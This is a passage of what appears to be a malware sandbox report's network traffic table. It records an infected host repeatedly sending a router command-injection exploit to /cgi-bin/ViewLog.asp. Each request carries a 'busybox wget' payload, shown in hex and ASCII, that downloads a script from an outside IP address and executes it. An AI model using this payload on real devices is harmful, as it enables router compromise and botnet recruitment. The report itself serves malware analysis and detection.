                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:33.112401962 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      68192.168.2.155118031.136.184.1198080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:03.465403080 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:04.154912949 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:05.530829906 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:08.378732920 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:14.010642052 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:25.018254995 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:48.057614088 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:33.112384081 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      69192.168.2.154837094.131.113.328080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:03.488434076 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:03.746242046 CET47INHTTP/1.1 400 Bad Request
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      70192.168.2.153495894.123.13.68080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:03.489135027 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      71192.168.2.153943831.200.49.2318080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:03.491192102 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      72192.168.2.155413094.123.101.2398080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:03.491517067 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      73192.168.2.154245862.29.6.1238080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:03.492799044 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      74192.168.2.154354294.120.212.188080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:03.492863894 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      75192.168.2.155975485.209.139.1688080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:03.494755983 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:03.746347904 CET1286INHTTP/1.0 400 Bad Request
                                                      Server: squid/3.1.23
                                                      Mime-Version: 1.0
                                                      Date: Wed, 14 Feb 2024 08:03:14 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 3167
                                                      X-Squid-Error: ERR_INVALID_URL 0
                                                      Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66
                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;background: #ffffff


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      76192.168.2.154079895.86.90.2258080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:03.499679089 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      77192.168.2.154513231.154.131.348080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:03.504359961 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      78192.168.2.155325431.136.11.2298080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:03.666949034 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:04.282903910 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:05.530831099 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:08.122754097 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:13.242681026 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:23.226326942 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:43.961915016 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
